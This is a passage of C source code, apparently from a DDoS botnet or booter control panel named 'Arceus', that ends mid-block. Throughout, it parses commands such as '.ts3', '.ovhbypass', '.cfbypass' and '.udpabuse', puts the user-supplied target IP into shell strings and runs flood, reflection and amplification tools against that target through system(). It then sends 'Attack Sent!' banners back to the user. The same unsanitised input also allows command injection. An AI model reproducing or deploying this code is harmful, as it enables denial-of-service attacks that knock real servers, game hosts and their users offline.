- sprintf(ipkill, "echo -e '\e[91m[\e[91mArceus\e[91m] \e[91mUser:\e[91m[\e[91m%s\e[91m] \e[91mMethod:\e[91m[\e[91mMSSQL\e[91m] \e[91mIP/Port:\e[91m[\e[91m%s\e[91m] \e[91mThreads:\e[91m[\e[91m2\e[91m] \e[91mPPS:\e[91m[\e[91mMAX\e[91m] \e[91mTime:\e[91m[\e[91m300\e[91m]'; echo -e '\e[91m[\e[91mArceus\e[91m] \e[91mUser:\e[91m[\e[91m%s\e[91m] \e[91mMethod:\e[91m[\e[91mMSSQL\e[91m] \e[91mIP/Port:\e[91m[\e[91m%s\e[91m] \e[91mThreads:\e[91m[\e[91m2\e[91m] \e[91mPPS:\e[91m[\e[91mMAX\e[91m] \e[91mTime:\e[91m[\e[91m300\e[91m]' >> logs/Arceus_IPHM_Attack.log; ./amp/methods/layer4/v1/reflection/mssql/mssql %s amp/methods/layer4/v1/reflection/mssql.txt 2 -1 300\r\n", accounts[find_line].username, iptarget, accounts[find_line].username, iptarget, iptarget);
- system(ipkill); // System Execution
- sprintf(arceus, "\x1b[91m╔══════════════════╗\r\n\x1b[91m║ \x1b[91mAttack Sent! \x1b[91m║ \x1b[91mIP \x1b[91m/ \x1b[91mPort\x1b[91m: \e[38;5;82m%s\r\n\x1b[91m║ \x1b[91mMethod\x1b[91m: \e[38;5;82mMSSQL \x1b[91m║ \x1b[91mTime\x1b[91m: \e[38;5;82m300\r\n\x1b[91m║ \x1b[91mUsage\x1b[91m: \e[38;5;82mIPHM-MSSQL\x1b[91m║ \x1b[91mThreads\x1b[91m: \e[38;5;82m2\r\n\x1b[91m╚══════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".ts3") || strstr(arceus_buffer_size, ".TS3")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "echo -e '\e[91m[\e[91mArceus\e[91m] \e[91mUser:\e[91m[\e[91m%s\e[91m] \e[91mMethod:\e[91m[\e[91mTS3\e[91m] \e[91mIP/Port:\e[91m[\e[91m%s\e[91m] \e[91mThreads:\e[91m[\e[91m2\e[91m] \e[91mPPS:\e[91m[\e[91mMAX\e[91m] \e[91mTime:\e[91m[\e[91m300\e[91m]'; echo -e '\e[91m[\e[91mArceus\e[91m] \e[91mUser:\e[91m[\e[91m%s\e[91m] \e[91mMethod:\e[91m[\e[91mTS3\e[91m] \e[91mIP/Port:\e[91m[\e[91m%s\e[91m] \e[91mThreads:\e[91m[\e[91m2\e[91m] \e[91mPPS:\e[91m[\e[91mMAX\e[91m] \e[91mTime:\e[91m[\e[91m300\e[91m]' >> logs/Arceus_IPHM_Attack.log; ./amp/methods/layer4/v1/reflection/ts3/ts3 %s amp/methods/layer4/v1/reflection/ts3.txt 2 -1 300\r\n", accounts[find_line].username, iptarget, accounts[find_line].username, iptarget, iptarget);
- system(ipkill); // System Execution
- sprintf(arceus, "\x1b[91m╔══════════════════╗\r\n\x1b[91m║ \x1b[91mAttack Sent! \x1b[91m║ \x1b[91mIP \x1b[91m/ \x1b[91mPort\x1b[91m: \e[38;5;82m%s\r\n\x1b[91m║ \x1b[91mMethod\x1b[91m: \e[38;5;82mTS3 \x1b[91m║ \x1b[91mTime\x1b[91m: \e[38;5;82m300\r\n\x1b[91m║ \x1b[91mUsage\x1b[91m: \e[38;5;82mIPHM-TS3 \x1b[91m║ \x1b[91mThreads\x1b[91m: \e[38;5;82m2\r\n\x1b[91m╚══════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".prowin") || strstr(arceus_buffer_size, ".PROWIN")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "echo -e '\e[91m[\e[91mArceus\e[91m] \e[91mUser:\e[91m[\e[91m%s\e[91m] \e[91mMethod:\e[91m[\e[91mPROWIN\e[91m] \e[91mIP/Port:\e[91m[\e[91m%s\e[91m]'; echo -e '\e[91m[\e[91mArceus\e[91m] \e[91mUser:\e[91m[\e[91m%s\e[91m] \e[91mMethod:\e[91m[\e[91mPROWIN\e[91m] \e[91mIP/Port:\e[91m[\e[91m%s\e[91m]' >> logs/Arceus_IPHM_Attack.log; ./amp/methods/layer4/v1/bandwidth/yubinacollection/prowin %s\r\n", accounts[find_line].username, iptarget, accounts[find_line].username, iptarget);
- system(ipkill); // System Execution
- sprintf(arceus, "\x1b[91m╔══════════════════╗\r\n\x1b[91m║ \x1b[91mAttack Sent! \x1b[91m║ \x1b[91mIP \x1b[91m/ \x1b[91mPort\x1b[91m: \e[38;5;82m%s\r\n\x1b[91m║ \x1b[91mMethod\x1b[91m: \e[38;5;82mPROWIN \x1b[91m║ \x1b[91mTime\x1b[91m: \e[38;5;82m300\r\n\x1b[91m║ \x1b[91mUsage\x1b[91m: \e[38;5;82mIPHM-PWIN \x1b[91m║ \x1b[91mThreads\x1b[91m: \e[38;5;82m2\r\n\x1b[91m╚══════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".winsyn") || strstr(arceus_buffer_size, ".WINSYN")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "echo -e '\e[91m[\e[91mArceus\e[91m] \e[91mUser:\e[91m[\e[91m%s\e[91m] \e[91mMethod:\e[91m[\e[91mWINSYN\e[91m] \e[91mIP/Port:\e[91m[\e[91m%s\e[91m]'; echo -e '\e[91m[\e[91mArceus\e[91m] \e[91mUser:\e[91m[\e[91m%s\e[91m] \e[91mMethod:\e[91m[\e[91mWINSYN\e[91m] \e[91mIP/Port:\e[91m[\e[91m%s\e[91m]' >> logs/Arceus_IPHM_Attack.log; ./amp/methods/layer4/v1/bandwidth/yubinacollection/winsyn %s\r\n", accounts[find_line].username, iptarget, accounts[find_line].username, iptarget, iptarget);
- system(ipkill); // System Execution
- sprintf(arceus, "\x1b[91m╔══════════════════╗\r\n\x1b[91m║ \x1b[91mAttack Sent! \x1b[91m║ \x1b[91mIP \x1b[91m/ \x1b[91mPort\x1b[91m: \e[38;5;82m%s\r\n\x1b[91m║ \x1b[91mMethod\x1b[91m: \e[38;5;82mWINSYN \x1b[91m║ \x1b[91mTime\x1b[91m: \e[38;5;82m300\r\n\x1b[91m║ \x1b[91mUsage\x1b[91m: \e[38;5;82mIPHM-WNSYN\x1b[91m║ \x1b[91mThreads\x1b[91m: \e[38;5;82m2\r\n\x1b[91m╚══════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".yubina") || strstr(arceus_buffer_size, ".YUBINA")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "echo -e '\e[91m[\e[91mArceus\e[91m] \e[91mUser:\e[91m[\e[91m%s\e[91m] \e[91mMethod:\e[91m[\e[91mYUBINA\e[91m] \e[91mIP/Port:\e[91m[\e[91m%s\e[91m]'; echo -e '\e[91m[\e[91mArceus\e[91m] \e[91mUser:\e[91m[\e[91m%s\e[91m] \e[91mMethod:\e[91m[\e[91mYUBNA\e[91m] \e[91mIP/Port:\e[91m[\e[91m%s\e[91m]' >> logs/Arceus_IPHM_Attack.log; ./amp/methods/layer4/v1/bandwidth/yubinacollection/yubina %s\r\n", accounts[find_line].username, iptarget, accounts[find_line].username, iptarget, iptarget);
- system(ipkill); // System Execution
- sprintf(arceus, "\x1b[91m╔══════════════════╗\r\n\x1b[91m║ \x1b[91mAttack Sent! \x1b[91m║ \x1b[91mIP \x1b[91m/ \x1b[91mPort\x1b[91m: \e[38;5;82m%s\r\n\x1b[91m║ \x1b[91mMethod\x1b[91m: \e[38;5;82mYUBINA \x1b[91m║ \x1b[91mTime\x1b[91m: \e[38;5;82m300\r\n\x1b[91m║ \x1b[91mUsage\x1b[91m: \e[38;5;82mIPHM-UBINA\x1b[91m║ \x1b[91mThreads\x1b[91m: \e[38;5;82m2\r\n\x1b[91m╚══════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".winseqid") || strstr(arceus_buffer_size, ".WINSEQID")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "echo -e '\e[91m[\e[91mArceus\e[91m] \e[91mUser:\e[91m[\e[91m%s\e[91m] \e[91mMethod:\e[91m[\e[91mWINSEQID\e[91m] \e[91mIP/Port:\e[91m[\e[91m%s\e[91m]'; echo -e '\e[91m[\e[91mArceus\e[91m] \e[91mUser:\e[91m[\e[91m%s\e[91m] \e[91mMethod:\e[91m[\e[91mWINSEQID\e[91m] \e[91mIP/Port:\e[91m[\e[91m%s\e[91m]' >> logs/Arceus_IPHM_Attack.log; ./amp/methods/layer4/v1/bandwidth/yubinacollection/winseqid %s\r\n", accounts[find_line].username, iptarget, accounts[find_line].username, iptarget, iptarget);
- system(ipkill); // System Execution
- sprintf(arceus, "\x1b[91m╔══════════════════╗\r\n\x1b[91m║ \x1b[91mAttack Sent! \x1b[91m║ \x1b[91mIP \x1b[91m/ \x1b[91mPort\x1b[91m: \e[38;5;82m%s\r\n\x1b[91m║ \x1b[91mMethod\x1b[91m: \e[38;5;82mWINSEQID \x1b[91m║ \x1b[91mTime\x1b[91m: \e[38;5;82m300\r\n\x1b[91m║ \x1b[91mUsage\x1b[91m: \e[38;5;82mIPHM-SEQID\x1b[91m║ \x1b[91mThreads\x1b[91m: \e[38;5;82m2\r\n\x1b[91m╚══════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".ovhbypass") || strstr(arceus_buffer_size, ".OVHBYPASS")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "./amp/methods/Bandwidth/ovhbypass %s 62141 300 UDP", iptarget); // Default Time Has Been Set To 30 Seconds. Default Port Is 62141
- system(ipkill); // System Execution
- sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m║ ╔═══════════════════════════╗\r\n \e[91m║ \e[91mMethod\e[91m:\e[91m OVHBYPASS \e[91m╠══════╣ \e[91m.KILL to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage\e[91m:\e[91m OVHBYPASS-IPHM\e[91m║ ╚═══════════════════════════╝\r\n \e[91m╚══════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".nfobypass") || strstr(arceus_buffer_size, ".NFOBYPASS")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "./amp/methods/Bandwidth/nfobypass %s 62141", iptarget); // Default Time Has Been Set To 30 Seconds. Default Port Is 62141
- system(ipkill); // System Execution
- sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m║ ╔═══════════════════════════╗\r\n \e[91m║ \e[91mMethod\e[91m:\e[91m NFOBYPASS \e[91m╠══════╣ \e[91m.KILL to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage\e[91m:\e[91m NFOBYPASS-IPHM\e[91m║ ╚═══════════════════════════╝\r\n \e[91m╚═══════════���══════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".cfbypass") || strstr(arceus_buffer_size, ".CFBYPASS")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "php amp/methods/Bandwidth/CF_Bypass %s proxy.txt 2 300", iptarget); // Default Time Has Been Set To 30 Seconds. Default Port Is 62141
- system(ipkill); // System Execution
- sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m║ ╔═══════════════════════════╗\r\n \e[91m║ \e[91mMethod\e[91m: \e[91mCFBYPASS \e[91m╠══════╣ \e[91m.KILL to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage\e[91m: \e[91mCFBYPASS-IPHM \e[91m║ ╚═══════════════════════════╝\r\n \e[91m╚══════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".bo4bypass") || strstr(arceus_buffer_size, ".BO4BYPASS")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "./amp/methods/Bandwidth/bo4bypass %s 62627 -1 300", iptarget); // Default Time Has Been Set To 30 Seconds. Default Port Is 62141
- system(ipkill); // System Execution
- sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m║ ╔═══════════════════════════╗\r\n \e[91m║ \e[91mMethod\e[91m:\e[91m BO4BYPASS \e[91m╠══════╣ \e[91m.KILL to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage\e[91m: \e[91mBO4BYPASS-IPHM\e[91m║ ╚═══════════════════════════╝\r\n \e[91m╚══════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".vse") || strstr(arceus_buffer_size, ".VSE")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "./amp/methods/Bandwidth/vse %s 2 -1 300", iptarget); // Default Time Has Been Set To 30 Seconds. Default Port Is 62141
- system(ipkill); // System Execution
- sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m║ ╔═══════════════════════════╗\r\n \e[91m║ \e[91mMethod\e[91m: \e[91mVSE \e[91m╠══════╣ \e[91m.KILL to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage\e[91m: \e[91mVSE-IPHM \e[91m║ ╚═══════════════════════════╝\r\n \e[91m╚══════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".dominate") || strstr(arceus_buffer_size, ".DOMINATE")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "./amp/methods/Bandwidth/dominate %s 62141 2 -1 300", iptarget); // Default Time Has Been Set To 30 Seconds. Default Port Is 62141
- system(ipkill); // System Execution
- sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m║ ╔═══════════════════════════╗\r\n \e[91m║ \e[91mMethod\e[91m: \e[91mDOMINATE \e[91m╠══════╣ \e[91m.KILL to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage\e[91m: \e[91mDOMINATE-IPHM \e[91m║ ╚═══════════════════════════╝\r\n \e[91m╚══════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".telnet") || strstr(arceus_buffer_size, ".TELNET")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "./amp/methods/Bandwidth/vse %s 2 -1 300", iptarget); // Default Time Has Been Set To 30 Seconds. Default Port Is 62141
- system(ipkill); // System Execution
- sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m║ ╔═══════════════════════════╗\r\n \e[91m║ \e[91mMethod\e[91m: \e[91mTELNET \e[91m╠══════╣ \e[91m.KILL to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage\e[91m: \e[91mTELNET-IPHM \e[91m║ ╚═══════════════════════════╝\r\n \e[91m╚══════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".udpabuse") || strstr(arceus_buffer_size, ".UDPABUSE")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "./amp/methods/Bandwidth/udp_abuse %s 62141 2 -1 300", iptarget); // Default Time Has Been Set To 30 Seconds. Default Port Is 62141
- system(ipkill); // System Execution
- sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m║ ╔═══════════════════════════╗\r\n \e[91m║ \e[91mMethod\e[91m: \e[91mUDPABUSE \e[91m╠══════╣ \e[91m.KILL to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage\e[91m:\e[91m UDPABUSE-IPHM \e[91m║ ╚═══════════════════════════╝\r\n \e[91m╚══════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".tcpabuse") || strstr(arceus_buffer_size, ".TCPABUSE")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "./amp/methods/Bandwidth/tcp_abuse %s 62141 2 -1 300", iptarget); // Default Time Has Been Set To 30 Seconds. Default Port Is 62141
- system(ipkill); // System Execution
- sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m║ ╔═══════════════════════════╗\r\n \e[91m║ \e[91mMethod\e[91m: \e[91mTCPABUSE \e[91m╠══════╣ \e[91m.KILL to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage\e[91m: \e[91mTCPABUSE-IPHM \e[91m║ ╚═══════════════════════════╝\r\n \e[91m╚══════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".csyn") || strstr(arceus_buffer_size, ".CSYN")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "./amp/methods/Bandwidth/csyn %s 62141 2 -1 300", iptarget); // Default Time Has Been Set To 30 Seconds. Default Port Is 62141
- system(ipkill); // System Execution
- sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m║ ╔═══════════════════════════╗\r\n \e[91m║ \e[91mMethod\e[91m:\e[91m CSYN \e[91m╠══════╣ \e[91m.KILL to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage\e[91m: \e[91mCSYN-IPHM \e[91m║ ╚═══════════════════════════╝\r\n \e[91m╚══════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".xsyn") || strstr(arceus_buffer_size, ".XSYN")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "./amp/methods/Bandwidth/xsyn %s 62141 2 -1 300", iptarget); // Default Time Has Been Set To 30 Seconds. Default Port Is 62141
- system(ipkill); // System Execution
- sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m║ ╔═══════════════════════════╗\r\n \e[91m║ \e[91mMethod\e[91m: \e[91mXSYN \e[91m╠══════╣ \e[91m.KILL to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage\e[91m: \e[91mXSYN-IPHM \e[91m║ ╚═══════════════════════════╝\r\n \e[91m╚══════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".zsyn") || strstr(arceus_buffer_size, ".ZSYN")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "./amp/methods/Bandwidth/zsyn %s 62141 2 -1 300", iptarget); // Default Time Has Been Set To 30 Seconds. Default Port Is 62141
- system(ipkill); // System Execution
- sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m║ ╔═══════════════════════════╗\r\n \e[91m║ \e[91mMethod\e[91m: \e[91mZSYN \e[91m╠══════╣ \e[91m.KILL to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage\e[91m: \e[91mZSYN-IPHM \e[91m║ ╚═══════════════════════════╝\r\n \e[91m╚══════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".issyn") || strstr(arceus_buffer_size, ".ISSYN")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "./amp/methods/Bandwidth/issyn.c %s 62141 2 -1 300", iptarget); // Default Time Has Been Set To 30 Seconds. Default Port Is 62141
- system(ipkill); // System Execution
- sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m║ ╔═══════════════════════════╗\r\n \e[91m║ \e[91mMethod\e[91m: \e[91mISSYN \e[91m╠══════╣ \e[91m.KILL to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage\e[91m: \e[91mISSYN-IPHM \e[91m║ ╚═══════════════════════════╝\r\n \e[91m╚══════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".essyn") || strstr(arceus_buffer_size, ".ESSYN")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "./amp/methods/Bandwidth/essyn.c %s 62141 2 -1 300", iptarget); // Default Time Has Been Set To 30 Seconds. Default Port Is 62141
- system(ipkill); // System Execution
- sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m║ ╔═══════════════════════════╗\r\n \e[91m║ \e[91mMethod\e[91m: \e[91mESSYN \e[91m╠══════╣ \e[91m.KILL to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage\e[91m: \e[91mESSYN-IPHM \e[91m║ ╚═══════════════════════════╝\r\n \e[91m╚══════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".HUN-FUN") || strstr(arceus_buffer_size, ".hun-fun")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
